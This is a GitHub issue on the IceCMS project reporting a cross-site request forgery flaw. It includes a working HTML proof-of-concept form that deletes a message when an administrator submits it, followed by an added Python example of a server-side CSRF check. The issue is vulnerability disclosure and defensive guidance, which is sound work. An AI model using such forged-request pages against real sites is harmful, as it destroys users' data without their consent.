Thecosy / IceCMS

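🌈 Ice cream content management system 🍦: implements a MacWK-style resource site and a community image/video circle CMS, with support for web, mobile and mini-program clients 🌟 Suitable for news and shopping sites, community forums, and chat and dating communities: blogs, circles, forums, images, video, social networking.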
https://www.icecms.cn
GNU Affero General Public License v3.0
1.62k stars 237 forks

There is a CSRF vulnerability that can delete the message #17

Open topdayplus opened 1 year ago

topdayplus commented 1 year ago

After the administrator opens the following page and clicks Submit request, the square message with ID 264 will be deleted.

```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.146.129:8181/square/DelectSquareById/264">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
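The form above has no `method` attribute, so the browser submits it as a GET and the delete runs on a plain navigation. A framework-neutral server-side check that would refuse it, as an added example that is not IceCMS code: the `x-csrf-token` header name, the per-session token, the sample requests and `other-site.example` are assumptions constructed for illustration, and the trusted origin is taken from the form's `action`.

```python
import hmac
from urllib.parse import urlsplit

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
# Assumption: the application's own origin, taken from the PoC's form action.
TRUSTED_ORIGIN = "http://192.168.146.129:8181"
# Route prefix from the PoC; every handler that changes state belongs here.
STATE_CHANGING_PREFIXES = ("/square/DelectSquareById/",)
TOKEN = "constructed-session-token"  # constructed sample value
PATH = "/square/DelectSquareById/264"

# Constructed sample requests: (method, path, lower-cased headers).
POC_GET = ("GET", PATH, {"referer": "http://other-site.example/p.html"})
FORGED_POST = ("POST", PATH, {"origin": "http://other-site.example"})
NO_TOKEN = ("DELETE", PATH, {"origin": TRUSTED_ORIGIN})
LEGIT_DELETE = ("DELETE", PATH,
                {"origin": TRUSTED_ORIGIN, "x-csrf-token": TOKEN})


def origin_of(url):
    """Reduce an Origin or Referer value to scheme://host[:port]."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None  # covers "Origin: null" and malformed values
    return f"{parts.scheme}://{parts.netloc}".lower()


def csrf_decision(method, path, headers, session_token):
    """Return (allowed, reason) for a single request."""
    if not path.startswith(STATE_CHANGING_PREFIXES):
        return True, "not a state-changing route"
    # 1. A delete must not be reachable by GET: links, images and
    #    default-method forms all issue GET with the session cookie.
    if method.upper() in SAFE_METHODS:
        return False, "state change on safe method"
    # 2. The request must come from the application's own origin.
    source = headers.get("origin") or headers.get("referer")
    if source is None or origin_of(source) != TRUSTED_ORIGIN:
        return False, "cross-origin or missing origin"
    # 3. The request must carry the session's secret token, which a
    #    page on another origin cannot read. Compare in constant time.
    sent = headers.get("x-csrf-token", "")
    if not session_token or not hmac.compare_digest(
            sent.encode(), session_token.encode()):
        return False, "bad csrf token"
    return True, "ok"
```
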